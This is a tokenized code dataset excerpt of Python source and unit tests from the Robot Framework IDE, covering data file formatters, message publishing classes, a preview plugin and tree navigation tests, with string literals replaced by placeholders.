<s> import os <EOL> from . encoding import decode_from_system as decode , encode_to_system as encode <EOL> def get_env_var ( name , default = None ) : <EOL> try : <EOL> value = os . environ [ encode ( name ) ] <EOL> except KeyError : <EOL> return default <EOL> else : <EOL> return decode ( value ) <EOL> def set_env_var ( name , value ) : <EOL> os . environ [ encode ( name ) ] = encode ( value ) <EOL> def del_env_var ( name ) : <EOL> value = get_env_var ( name ) <EOL> if value is not None : <EOL> del os . environ [ encode ( name ) ] <EOL> return value <EOL> def get_env_vars ( upper = os . sep != '<STR_LIT:/>' ) : <EOL> return dict ( ( name if not upper else name . upper ( ) , get_env_var ( name ) ) <EOL> for name in ( decode ( name ) for name in os . environ ) ) </s>
<s> import re <EOL> from . aligners import FirstColumnAligner , ColumnAligner , NullAligner <EOL> from . dataextractor import DataExtractor <EOL> from . rowsplitter import RowSplitter <EOL> class _DataFileFormatter ( object ) : <EOL> _whitespace = re . compile ( '<STR_LIT>' ) <EOL> _split_multiline_doc = True <EOL> def __init__ ( self , column_count ) : <EOL> self . _splitter = RowSplitter ( column_count , self . _split_multiline_doc ) <EOL> self . _column_count = column_count <EOL> self . _extractor = DataExtractor ( self . _want_names_on_first_content_row ) <EOL> def _want_names_on_first_content_row ( self , table , name ) : <EOL> return True <EOL> def empty_row_after ( self , table ) : <EOL> return self . _format_row ( [ ] , table ) <EOL> def format_header ( self , table ) : <EOL> header = self . _format_row ( table . header ) <EOL> return self . _format_header ( header , table ) <EOL> def format_table ( self , table ) : <EOL> rows = self . _extractor . rows_from_table ( table ) <EOL> if self . _should_split_rows ( table ) : <EOL> rows = self . _split_rows ( rows , table ) <EOL> return ( self . _format_row ( r , table ) for r in rows ) <EOL> def _should_split_rows ( self , table ) : <EOL> return not self . _should_align_columns ( table ) <EOL> def _split_rows ( self , original_rows , table ) : <EOL> for original in original_rows : <EOL> for split in self . _splitter . split ( original , table . type ) : <EOL> yield split <EOL> def _should_align_columns ( self , table ) : <EOL> return self . _is_indented_table ( table ) and bool ( table . header [ <NUM_LIT:1> : ] ) <EOL> def _is_indented_table ( self , table ) : <EOL> return table is not None and table . type in [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> def _escape_consecutive_whitespace ( self , row ) : <EOL> return [ self . _whitespace . sub ( self . _whitespace_escaper , <EOL> cell . replace ( '<STR_LIT:\n>' , '<STR_LIT:U+0020>' ) ) for cell in row ] <EOL> def _whitespace_escaper ( self , match ) : <EOL> return '<STR_LIT:\\>' . join ( match . group ( <NUM_LIT:0> ) ) <EOL> def _format_row ( self , row , table = None ) : <EOL> raise NotImplementedError <EOL> def _format_header ( self , header , table ) : <EOL> raise NotImplementedError <EOL> class TsvFormatter ( _DataFileFormatter ) : <EOL> def _format_header ( self , header , table ) : <EOL> return [ self . _format_header_cell ( cell ) for cell in header ] <EOL> def _format_header_cell ( self , cell ) : <EOL> return '<STR_LIT>' % cell if cell else '<STR_LIT>' <EOL> def _format_row ( self , row , table = None ) : <EOL> return self . _pad ( self . _escape ( row ) ) <EOL> def _escape ( self , row ) : <EOL> return self . _escape_consecutive_whitespace ( self . _escape_tabs ( row ) ) <EOL> def _escape_tabs ( self , row ) : <EOL> return [ c . replace ( '<STR_LIT:\t>' , '<STR_LIT>' ) for c in row ] <EOL> def _pad ( self , row ) : <EOL> row = [ cell . replace ( '<STR_LIT:\n>' , '<STR_LIT:U+0020>' ) for cell in row ] <EOL> return row + [ '<STR_LIT>' ] * ( self . _column_count - len ( row ) ) <EOL> class TxtFormatter ( _DataFileFormatter ) : <EOL> _test_or_keyword_name_width = <NUM_LIT> <EOL> _setting_and_variable_name_width = <NUM_LIT> <EOL> def _format_row ( self , row , table = None ) : <EOL> row = self . _escape ( row ) <EOL> aligner = self . _aligner_for ( table ) <EOL> return aligner . align_row ( row ) <EOL> def _aligner_for ( self , table ) : <EOL> if table and table . type in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> return FirstColumnAligner ( self . _setting_and_variable_name_width ) <EOL> if self . _should_align_columns ( table ) : <EOL> return ColumnAligner ( self . _test_or_keyword_name_width , table ) <EOL> return NullAligner ( ) <EOL> def _format_header ( self , header , table ) : <EOL> header = [ '<STR_LIT>' % header [ <NUM_LIT:0> ] ] + header [ <NUM_LIT:1> : ] <EOL> aligner = self . _aligner_for ( table ) <EOL> return aligner . align_row ( header ) <EOL> def _want_names_on_first_content_row ( self , table , name ) : <EOL> return self . _should_align_columns ( table ) and len ( name ) <= self . _test_or_keyword_name_width <EOL> def _escape ( self , row ) : <EOL> if not row : <EOL> return row <EOL> return self . _escape_cells ( self . _escape_consecutive_whitespace ( row ) ) <EOL> def _escape_cells ( self , row ) : <EOL> return [ row [ <NUM_LIT:0> ] ] + [ self . _escape_empty ( cell ) for cell in row [ <NUM_LIT:1> : ] ] <EOL> def _escape_empty ( self , cell ) : <EOL> return cell or '<STR_LIT:\\>' <EOL> class PipeFormatter ( TxtFormatter ) : <EOL> def _escape_cells ( self , row ) : <EOL> return [ self . _escape_empty ( self . _escape_pipes ( cell ) ) for cell in row ] <EOL> def _escape_empty ( self , cell ) : <EOL> return cell or '<STR_LIT:U+0020>' <EOL> def _escape_pipes ( self , cell ) : <EOL> if '<STR_LIT>' in cell : <EOL> cell = cell . replace ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> if cell . startswith ( '<STR_LIT>' ) : <EOL> cell = '<STR_LIT:\\>' + cell <EOL> if cell . endswith ( '<STR_LIT>' ) : <EOL> cell = cell [ : - <NUM_LIT:1> ] + '<STR_LIT>' <EOL> return cell </s>
<s> import inspect <EOL> import sys <EOL> import traceback <EOL> from robotide import utils <EOL> from . import messagetype <EOL> from . import publisher <EOL> class RideMessage ( object ) : <EOL> """<STR_LIT>""" <EOL> __metaclass__ = messagetype . messagetype <EOL> topic = None <EOL> data = [ ] <EOL> def __init__ ( self , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> if sorted ( kwargs . keys ( ) ) != sorted ( self . data ) : <EOL> raise TypeError ( '<STR_LIT>' % self . data ) <EOL> self . __dict__ . update ( kwargs ) <EOL> def publish ( self ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> self . _publish ( self ) <EOL> except Exception , err : <EOL> self . _publish ( RideLogException ( message = '<STR_LIT>' + str ( err ) , <EOL> exception = err , level = '<STR_LIT>' ) ) <EOL> def _publish ( self , msg ) : <EOL> publisher . PUBLISHER . publish ( msg . topic , msg ) <EOL> class RideLog ( RideMessage ) : <EOL> """<STR_LIT>""" <EOL> data = [ '<STR_LIT:message>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> class RideLogMessage ( RideLog ) : <EOL> """<STR_LIT>""" <EOL> data = [ '<STR_LIT:message>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> def __init__ ( self , message , level = '<STR_LIT>' , notify_user = False ) : <EOL> """<STR_LIT>""" <EOL> RideMessage . __init__ ( <EOL> self , message = message , level = level , <EOL> timestamp = utils . get_timestamp ( ) , notify_user = notify_user ) <EOL> class RideLogException ( RideLog ) : <EOL> """<STR_LIT>""" <EOL> data = [ '<STR_LIT:message>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> def __init__ ( self , message , exception , level = '<STR_LIT>' , notify_user = False ) : <EOL> """<STR_LIT>""" <EOL> exc_type , exc_value , exc_traceback = sys . exc_info ( ) <EOL> if exc_traceback : <EOL> tb = traceback . extract_tb ( exc_traceback ) <EOL> message += '<STR_LIT>' % ( unicode ( exception ) , '<STR_LIT>' . join ( traceback . format_list ( tb ) ) ) <EOL> RideMessage . __init__ ( <EOL> self , message = message , level = level , notify_user = False , <EOL> timestamp = utils . get_timestamp ( ) , exception = exception ) <EOL> class RideInputValidationError ( RideMessage ) : <EOL> """<STR_LIT>""" <EOL> data = [ '<STR_LIT:message>' ] <EOL> class RideModificationPrevented ( RideMessage ) : <EOL> """<STR_LIT>""" <EOL> data = [ '<STR_LIT>' ] <EOL> class RideSettingsChanged ( RideMessage ) : <EOL> """<STR_LIT>""" <EOL> data = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> class RideExecuteSpecXmlImport ( RideMessage ) : <EOL> """<STR_LIT>""" <EOL> class RideTreeSelection ( RideMessage ) : <EOL> """<STR_LIT>""" <EOL> data = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> class RideOpenVariableDialog ( RideMessage ) : <EOL> """<STR_LIT>""" <EOL> data = [ '<STR_LIT>' ] <EOL> class RideTestExecutionStarted ( RideMessage ) : <EOL> """<STR_LIT>""" <EOL> data = [ '<STR_LIT>' ] <EOL> class RideTestSelectedForRunningChanged ( RideMessage ) : <EOL> """<STR_LIT>""" <EOL> data = [ '<STR_LIT>' ] <EOL> class RideTestRunning ( RideMessage ) : <EOL> """<STR_LIT>""" <EOL> data = [ '<STR_LIT>' ] <EOL> class RideTestPassed ( RideMessage ) : <EOL> """<STR_LIT>""" <EOL> data = [ '<STR_LIT>' ] <EOL> class RideTestFailed ( RideMessage ) : <EOL> """<STR_LIT>""" <EOL> data = [ '<STR_LIT>' ] <EOL> class RideNotebookTabChanging ( RideMessage ) : <EOL> """<STR_LIT>""" <EOL> data = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> class RideNotebookTabChanged ( RideMessage ) : <EOL> """<STR_LIT>""" <EOL> class RideSaving ( RideMessage ) : <EOL> """<STR_LIT>""" <EOL> data = [ '<STR_LIT:path>' , '<STR_LIT>' ] <EOL> class RideSaved ( RideMessage ) : <EOL> """<STR_LIT>""" <EOL> data = [ '<STR_LIT:path>' ] <EOL> class RideSaveAll ( RideMessage ) : <EOL> """<STR_LIT>""" <EOL> class RideDataDirtyCleared ( RideMessage ) : <EOL> """<STR_LIT>""" <EOL> data = [ '<STR_LIT>' ] <EOL> class RideNewProject ( RideMessage ) : <EOL> """<STR_LIT>""" <EOL> data = [ '<STR_LIT:path>' , '<STR_LIT>' ] <EOL> class RideClosing ( RideMessage ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class RideOpenSuite ( RideMessage ) : <EOL> """<STR_LIT>""" <EOL> data = [ '<STR_LIT:path>' , '<STR_LIT>' ] <EOL> class RideOpenResource ( RideMessage ) : <EOL> """<STR_LIT>""" <EOL> data = [ '<STR_LIT:path>' , '<STR_LIT>' ] <EOL> class RideSelectResource ( RideMessage ) : <EOL> """<STR_LIT>""" <EOL> data = [ '<STR_LIT>' ] <EOL> class RideDataChanged ( RideMessage ) : <EOL> """<STR_LIT>""" <EOL> class RideFileNameChanged ( RideDataChanged ) : <EOL> """<STR_LIT>""" <EOL> data = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> class RideDataFileRemoved ( RideDataChanged ) : <EOL> data = [ '<STR_LIT:path>' , '<STR_LIT>' ] <EOL> class RideSuiteAdded ( RideDataChanged ) : <EOL> data = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> class RideInitFileRemoved ( RideDataChanged ) : <EOL> data = [ '<STR_LIT:path>' , '<STR_LIT>' ] <EOL> class RideImportSetting ( RideDataChanged ) : <EOL> """<STR_LIT>""" <EOL> data = [ '<STR_LIT>' , '<STR_LIT:type>' , '<STR_LIT>' ] <EOL> def is_resource ( self ) : <EOL> return self . type == '<STR_LIT>' <EOL> @ property <EOL> def name ( self ) : <EOL> return self . import_controller . name <EOL> class _RideExcludes ( RideMessage ) : <EOL> data = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> class RideIncludesChanged ( _RideExcludes ) : <EOL> pass <EOL> class RideExcludesChanged ( _RideExcludes ) : <EOL> pass <EOL> class RideImportSettingAdded ( RideImportSetting ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class RideImportSettingChanged ( RideImportSetting ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class RideImportSettingRemoved ( RideImportSetting ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class RideDataChangedToDirty ( RideDataChanged ) : <EOL> """<STR_LIT>""" <EOL> data = [ '<STR_LIT>' ] <EOL> class RideDataFileSet ( RideDataChanged ) : <EOL> """<STR_LIT>""" <EOL> data = [ '<STR_LIT>' ] <EOL> class RideUserKeyword ( RideDataChanged ) : <EOL> """<STR_LIT>""" <EOL> class RideUserKeywordAdded ( RideUserKeyword ) : <EOL> """<STR_LIT>""" <EOL> data = [ '<STR_LIT>' , '<STR_LIT:name>' , '<STR_LIT>' ] <EOL> class RideUserKeywordRemoved ( RideUserKeyword ) : <EOL> """<STR_LIT>""" <EOL> data = [ '<STR_LIT>' , '<STR_LIT:name>' , '<STR_LIT>' ] <EOL> class RideItem ( RideDataChanged ) : <EOL> """<STR_LIT>""" <EOL> data = [ '<STR_LIT>' ] <EOL> class RideItemStepsChanged ( RideItem ) : <EOL> """<STR_LIT>""" <EOL> class RideItemNameChanged ( RideItem ) : <EOL> """<STR_LIT>""" <EOL> class RideItemSettingsChanged ( RideItem ) : <EOL> """<STR_LIT>""" <EOL> class RideTestCaseAdded ( RideDataChanged ) : <EOL> """<STR_LIT>""" <EOL> data = [ '<STR_LIT>' , '<STR_LIT:name>' , '<STR_LIT>' ] <EOL> class RideTestCaseRemoved ( RideDataChanged ) : <EOL> """<STR_LIT>""" <EOL> data = [ '<STR_LIT>' , '<STR_LIT:name>' , '<STR_LIT>' ] <EOL> class RideItemMovedUp ( RideDataChanged ) : <EOL> """<STR_LIT>""" <EOL> data = [ '<STR_LIT>' ] <EOL> class RideItemMovedDown ( RideDataChanged ) : <EOL> """<STR_LIT>""" <EOL> data = [ '<STR_LIT>' ] <EOL> class RideVariableAdded ( RideDataChanged ) : <EOL> """<STR_LIT>""" <EOL> data = [ '<STR_LIT>' , '<STR_LIT:name>' , '<STR_LIT>' , '<STR_LIT:index>' ] <EOL> class RideVariableRemoved ( RideDataChanged ) : <EOL> """<STR_LIT>""" <EOL> data = [ '<STR_LIT>' , '<STR_LIT:name>' , '<STR_LIT>' ] <EOL> class RideVariableMovedUp ( RideItemMovedUp ) : <EOL> """<STR_LIT>""" <EOL> data = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> class RideVariableMovedDown ( RideItemMovedDown ) : <EOL> """<STR_LIT>""" <EOL> data = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> class RideVariableUpdated ( RideDataChanged ) : <EOL> """<STR_LIT>""" <EOL> data = [ '<STR_LIT>' ] <EOL> class RideOpenTagSearch ( RideMessage ) : <EOL> """<STR_LIT>""" <EOL> data = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> __all__ = [ name for name , cls in globals ( ) . items ( ) <EOL> if inspect . isclass ( cls ) and issubclass ( cls , RideMessage ) ] </s>
<s> import wx . html <EOL> from StringIO import StringIO <EOL> from robotide . pluginapi import Plugin , ActionInfo , TreeAwarePluginMixin <EOL> from robotide . publish import ( RideTreeSelection , RideNotebookTabChanged , <EOL> RideTestCaseAdded , RideUserKeywordAdded ) <EOL> from robotide . robotapi import TestCase , UserKeyword <EOL> from robotide . widgets import ButtonWithHandler , Font <EOL> from robotide . utils import Printing <EOL> class PreviewPlugin ( Plugin , TreeAwarePluginMixin ) : <EOL> """<STR_LIT>""" <EOL> datafile = property ( lambda self : self . get_selected_datafile ( ) ) <EOL> def __init__ ( self , application ) : <EOL> Plugin . __init__ ( self , application , default_settings = { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> self . _panel = None <EOL> def enable ( self ) : <EOL> self . register_action ( ActionInfo ( '<STR_LIT>' , '<STR_LIT>' , self . OnShowPreview , <EOL> shortcut = '<STR_LIT>' , <EOL> doc = '<STR_LIT>' , <EOL> position = <NUM_LIT> ) ) <EOL> self . subscribe ( self . OnTreeSelection , RideTreeSelection ) <EOL> self . subscribe ( self . OnTabChanged , RideNotebookTabChanged ) <EOL> self . subscribe ( self . _update_preview , RideTestCaseAdded ) <EOL> self . subscribe ( self . _update_preview , RideUserKeywordAdded ) <EOL> self . add_self_as_tree_aware_plugin ( ) <EOL> def disable ( self ) : <EOL> self . remove_self_from_tree_aware_plugins ( ) <EOL> self . unsubscribe_all ( ) <EOL> self . unregister_actions ( ) <EOL> self . delete_tab ( self . _panel ) <EOL> self . _panel = None <EOL> def is_focused ( self ) : <EOL> return self . tab_is_visible ( self . _panel ) <EOL> def OnShowPreview ( self , event ) : <EOL> if not self . _panel : <EOL> self . _panel = PreviewPanel ( self , self . notebook ) <EOL> self . show_tab ( self . _panel ) <EOL> self . _update_preview ( ) <EOL> def OnTreeSelection ( self , event ) : <EOL> if self . is_focused ( ) : <EOL> self . _panel . tree_node_selected ( event . item ) <EOL> def OnTabChanged ( self , event ) : <EOL> self . _update_preview ( ) <EOL> def _update_preview ( self , event = None ) : <EOL> if self . is_focused ( ) and self . datafile : <EOL> self . _panel . update_preview ( ) <EOL> class PreviewPanel ( wx . Panel ) : <EOL> _formats = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> def __init__ ( self , parent , notebook ) : <EOL> wx . Panel . __init__ ( self , notebook ) <EOL> self . _parent = parent <EOL> main_sizer = wx . BoxSizer ( wx . VERTICAL ) <EOL> self . SetSizer ( main_sizer ) <EOL> self . _format = parent . format <EOL> self . __view = None <EOL> self . _printing = Printing ( self ) <EOL> box = wx . BoxSizer ( wx . HORIZONTAL ) <EOL> box . Add ( self . _chooser ( ) ) <EOL> box . Add ( self . _print_button ( ) , <NUM_LIT:1> , wx . ALIGN_CENTER_VERTICAL | wx . EXPAND ) <EOL> self . Sizer . Add ( box ) <EOL> notebook . AddPage ( self , "<STR_LIT>" ) <EOL> def OnPrint ( self , evt ) : <EOL> self . _printing . preview_text ( self . _get_content ( ) ) <EOL> @ property <EOL> def _file_format ( self ) : <EOL> if self . _format == '<STR_LIT>' : <EOL> return self . _format . lower ( ) <EOL> return '<STR_LIT>' <EOL> @ property <EOL> def _pipe_separated ( self ) : <EOL> return '<STR_LIT>' in self . _format <EOL> def _chooser ( self ) : <EOL> chooser = wx . RadioBox ( self , label = '<STR_LIT>' , choices = self . _formats ) <EOL> chooser . SetStringSelection ( self . _format ) <EOL> self . Bind ( wx . EVT_RADIOBOX , self . OnTypeChanged , chooser ) <EOL> return chooser <EOL> def _print_button ( self ) : <EOL> return ButtonWithHandler ( self , '<STR_LIT>' ) <EOL> @ property <EOL> def _view ( self ) : <EOL> view_class = HtmlView if self . _file_format == '<STR_LIT:html>' else TxtView <EOL> if isinstance ( self . __view , view_class ) : <EOL> return self . __view <EOL> self . _remove_current_view ( ) <EOL> self . __view = self . _create_view ( view_class ) <EOL> return self . __view <EOL> def _remove_current_view ( self ) : <EOL> if self . __view : <EOL> self . Sizer . Remove ( self . __view ) <EOL> self . __view . Destroy ( ) <EOL> def _create_view ( self , view_class ) : <EOL> view = view_class ( self ) <EOL> self . Sizer . Add ( view , <NUM_LIT:1> , wx . EXPAND | wx . ALL , border = <NUM_LIT:8> ) <EOL> self . Sizer . Layout ( ) <EOL> return view <EOL> def tree_node_selected ( self , item ) : <EOL> self . update_preview ( ) <EOL> self . _view . scroll_to_subitem ( item ) <EOL> def update_preview ( self ) : <EOL> self . _view . set_content ( self . _get_content ( ) ) <EOL> def _get_content ( self ) : <EOL> datafile = self . _parent . datafile <EOL> if not datafile : <EOL> return '<STR_LIT>' <EOL> output = StringIO ( ) <EOL> try : <EOL> datafile . save ( <EOL> output = output , <EOL> format = self . _file_format , <EOL> pipe_separated = self . _pipe_separated , <EOL> txt_separating_spaces = self . _parent . global_settings [ '<STR_LIT>' ] <EOL> ) <EOL> except Exception , e : <EOL> return "<STR_LIT>" % ( datafile . name , e ) <EOL> else : <EOL> return output . getvalue ( ) <EOL> def OnTypeChanged ( self , event ) : <EOL> self . _format = event . String <EOL> self . update_preview ( ) <EOL> self . _parent . save_setting ( '<STR_LIT>' , self . _format ) <EOL> class HtmlView ( wx . html . HtmlWindow ) : <EOL> def __init__ ( self , parent ) : <EOL> wx . html . HtmlWindow . __init__ ( self , parent ) <EOL> self . SetStandardFonts ( ) <EOL> def set_content ( self , content ) : <EOL> self . SetPage ( content ) <EOL> def scroll_to_subitem ( self , item ) : <EOL> anchor = self . _get_anchor ( item . data ) <EOL> if self . HasAnchor ( anchor ) : <EOL> self . ScrollToAnchor ( anchor ) <EOL> self . ScrollLines ( - <NUM_LIT:1> ) <EOL> else : <EOL> self . Scroll ( <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> def _get_anchor ( self , data ) : <EOL> if isinstance ( data , UserKeyword ) : <EOL> return '<STR_LIT>' % data . name <EOL> if isinstance ( data , TestCase ) : <EOL> return '<STR_LIT>' % data . name <EOL> return '<STR_LIT>' <EOL> class TxtView ( wx . TextCtrl ) : <EOL> def __init__ ( self , parent ) : <EOL> wx . TextCtrl . __init__ ( self , parent , style = wx . TE_MULTILINE ) <EOL> self . SetEditable ( False ) <EOL> self . SetFont ( Font ( ) . fixed ) <EOL> def set_content ( self , content ) : <EOL> self . SetValue ( content ) <EOL> def scroll_to_subitem ( self , item ) : <EOL> pass </s>
<s> import wx <EOL> class PopupCreator ( object ) : <EOL> def __init__ ( self ) : <EOL> self . _external_hooks = [ ] <EOL> def add_hook ( self , hook ) : <EOL> self . _external_hooks . append ( hook ) <EOL> def remove_hook ( self , hook ) : <EOL> self . _external_hooks . remove ( hook ) <EOL> def _get_all_actions ( self , fixed_menu_items , data ) : <EOL> menu_items = fixed_menu_items <EOL> external_items = self . _get_external_menu_items ( data ) <EOL> if external_items : <EOL> menu_items . add_separator ( ) <EOL> for item in external_items : <EOL> menu_items . add_menu_item ( item ) <EOL> return menu_items <EOL> def _get_external_menu_items ( self , data ) : <EOL> menu_items = [ ] <EOL> for hook in self . _external_hooks : <EOL> menu_items . extend ( hook ( data ) ) <EOL> return menu_items <EOL> def show ( self , parent , fixed_menu_items , data ) : <EOL> PopupMenu ( parent , self . _get_all_actions ( fixed_menu_items , data ) ) <EOL> class PopupMenu ( wx . Menu ) : <EOL> def __init__ ( self , parent , menu_items ) : <EOL> wx . Menu . __init__ ( self ) <EOL> for item in menu_items : <EOL> if item . is_separator ( ) : <EOL> self . AppendSeparator ( ) <EOL> else : <EOL> self . _add_item ( parent , item ) <EOL> parent . PopupMenu ( self ) <EOL> self . Destroy ( ) <EOL> def _add_item ( self , parent , item ) : <EOL> id_ = wx . NewId ( ) <EOL> self . Append ( id_ , item . name ) <EOL> parent . Bind ( wx . EVT_MENU , item . callable , id = id_ ) <EOL> class PopupMenuItems ( object ) : <EOL> def __init__ ( self , parent = None , menu_names = [ ] ) : <EOL> self . _items = [ ] <EOL> for item in menu_names : <EOL> self . add_menu_item ( PopupMenuItem ( item , parent = parent ) ) <EOL> def __iter__ ( self ) : <EOL> return iter ( self . _items ) <EOL> def add_menu_item ( self , item ) : <EOL> self . _items . append ( item ) <EOL> def add_separator ( self ) : <EOL> self . add_menu_item ( PopupMenuItem ( '<STR_LIT>' ) ) <EOL> class PopupMenuItem ( object ) : <EOL> def __init__ ( self , name , callable = None , parent = None ) : <EOL> self . name = name <EOL> self . callable = self . _get_callable ( name , callable , parent ) <EOL> def _get_callable ( self , name , callable , parent ) : <EOL> if callable : <EOL> return callable <EOL> if name == '<STR_LIT>' : <EOL> return None <EOL> handler_name = '<STR_LIT>' . join ( x for x in name . split ( '<STR_LIT:\t>' ) [ <NUM_LIT:0> ] . title ( ) if not x . isspace ( ) ) <EOL> return getattr ( parent , '<STR_LIT>' + handler_name ) <EOL> def is_separator ( self ) : <EOL> return self . name == '<STR_LIT>' </s>
<s> import tempfile <EOL> import unittest <EOL> import os <EOL> import datafilereader <EOL> from robotide . controller . filecontrollers import TestDataDirectoryController , ExcludedDirectoryController , DirtyRobotDataException <EOL> class TestExcludesLogic ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> self . project = datafilereader . construct_project ( datafilereader . SIMPLE_TEST_SUITE_PATH , tempfile . gettempdir ( ) ) <EOL> def tearDown ( self ) : <EOL> p = self . project . _settings . excludes . _exclude_file_path <EOL> if os . path . exists ( p ) : <EOL> os . remove ( p ) <EOL> def _get_resource_dir ( self ) : <EOL> return datafilereader . get_ctrl_by_name ( datafilereader . SIMPLE_TEST_SUITE_INNER_RESOURCE_DIR , self . project . datafiles ) <EOL> def test_excluding_and_including ( self ) : <EOL> resource_dir = self . _get_resource_dir ( ) <EOL> self . assertEqual ( resource_dir . __class__ , TestDataDirectoryController ) <EOL> resource_dir . exclude ( ) <EOL> resource_dir = self . _get_resource_dir ( ) <EOL> self . assertEqual ( resource_dir . __class__ , ExcludedDirectoryController ) <EOL> resource_dir . remove_from_excludes ( ) <EOL> resource_dir = self . _get_resource_dir ( ) <EOL> self . assertEqual ( resource_dir . __class__ , TestDataDirectoryController ) <EOL> def test_excluding_throws_exception_if_dirty_data ( self ) : <EOL> resource_dir = self . _get_resource_dir ( ) <EOL> resu = resource_dir . children [ <NUM_LIT:0> ] <EOL> resu . mark_dirty ( ) <EOL> self . assertRaises ( DirtyRobotDataException , resource_dir . exclude ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> unittest . main ( ) </s>
<s> import unittest <EOL> from nose . tools import assert_equals <EOL> from robotide . robotapi import TestCase , TestCaseFile <EOL> from robotide . controller . commands import ChangeTag <EOL> from robotide . controller . filecontrollers import TestCaseFileController <EOL> from robotide . controller . macrocontrollers import TestCaseController <EOL> from robotide . controller . tablecontrollers import TestCaseTableController <EOL> from robotide . controller . tags import Tag <EOL> from robotide . controller . ui . treecontroller import TreeController , _History , TestSelectionController <EOL> class ActionRegistererMock ( object ) : <EOL> def register_actions ( self , action_collections ) : <EOL> self . action_collections = action_collections <EOL> def register_action ( self , action ) : <EOL> pass <EOL> class TestTreeController ( unittest . TestCase ) : <EOL> def test_register_tree_actions ( self ) : <EOL> mocked_ar = ActionRegistererMock ( ) <EOL> TreeController ( None , mocked_ar , None , None ) . register_tree_actions ( ) <EOL> self . assertEquals ( <EOL> [ "<STR_LIT>" , "<STR_LIT>" ] , <EOL> [ a . name for a in mocked_ar . action_collections ] ) <EOL> class _BaseTreeControllerTest ( object ) : <EOL> def setUp ( self ) : <EOL> self . history = _History ( ) <EOL> self . controller = TreeController ( <EOL> self . _tree_mock ( ) , None , None , None , history = self . history ) <EOL> self . controller . add_to_history ( "<STR_LIT>" ) <EOL> def _tree_mock ( self ) : <EOL> tree_mock = lambda : <NUM_LIT:0> <EOL> self . _tree_mock_items = [ ] <EOL> tree_mock . SelectItem = lambda i : self . _tree_mock_items . append ( i ) <EOL> return tree_mock <EOL> def _select_node ( self , value ) : <EOL> self . controller . add_to_history ( value ) <EOL> def _go_back_and_return_selection ( self ) : <EOL> self . controller . OnGoBack ( None ) <EOL> return self . _tree_mock_items [ - <NUM_LIT:1> ] <EOL> def _go_forward_and_return_selection ( self ) : <EOL> self . controller . OnGoForward ( None ) <EOL> return self . _tree_mock_items [ - <NUM_LIT:1> ] <EOL> class TestNavigationHistory ( _BaseTreeControllerTest , unittest . TestCase ) : <EOL> def test_go_back_one_level ( self ) : <EOL> self . _select_node ( '<STR_LIT>' ) <EOL> self . assertEquals ( '<STR_LIT>' , self . _go_back_and_return_selection ( ) ) <EOL> def test_go_back_two_levels ( self ) : <EOL> nodes = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> for name in nodes : <EOL> self . _select_node ( name ) <EOL> nodes . reverse ( ) <EOL> for name in nodes [ <NUM_LIT:1> : ] : <EOL> self . assertEquals ( name , self . _go_back_and_return_selection ( ) ) <EOL> def test_it_is_not_possible_to_go_back_farther_than_history ( self ) : <EOL> nodes = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> for name in nodes : <EOL> self . _select_node ( name ) <EOL> nodes . reverse ( ) <EOL> for name in nodes [ <NUM_LIT:1> : ] + [ '<STR_LIT>' ] : <EOL> self . _go_back_and_assert_selection ( name ) <EOL> self . _go_back_and_assert_selection ( '<STR_LIT>' ) <EOL> def test_go_back_with_selecting_in_between ( self ) : <EOL> nodes = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> for name in nodes : <EOL> self . _select_node ( name ) <EOL> self . _go_back_and_assert_selection ( '<STR_LIT>' ) <EOL> self . _select_node ( '<STR_LIT>' ) <EOL> self . _go_back_and_assert_selection ( '<STR_LIT>' ) <EOL> def test_go_forward ( self ) : <EOL> nodes = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> for name in nodes : <EOL> self . _select_node ( name ) <EOL> for _ in range ( <NUM_LIT:3> ) : <EOL> self . controller . OnGoBack ( None ) <EOL> for name in nodes : <EOL> self . _go_forward_and_assert_selection ( name ) <EOL> def test_go_back_and_forward_between_suite_and_resource ( self ) : <EOL> nodes = [ '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> for name in nodes : <EOL> self . _select_node ( name ) <EOL> self . _go_back_and_assert_selection ( '<STR_LIT>' ) <EOL> self . _go_back_and_assert_selection ( '<STR_LIT>' ) <EOL> self . _go_forward_and_assert_selection ( '<STR_LIT>' ) <EOL> self . _go_forward_and_assert_selection ( '<STR_LIT>' ) <EOL> def _go_back_and_assert_selection ( self , expected_selection ) : <EOL> assert_equals ( self . _go_back_and_return_selection ( ) , expected_selection ) <EOL> def _go_forward_and_assert_selection ( self , expected_selection ) : <EOL> assert_equals ( <EOL> self . _go_forward_and_return_selection ( ) , expected_selection ) <EOL> class TestTestSelectionController ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> self . _tsc = TestSelectionController ( ) <EOL> def test_test_selection_is_empty_by_default ( self ) : <EOL> self . assertTrue ( self . _tsc . is_empty ( ) ) <EOL> def 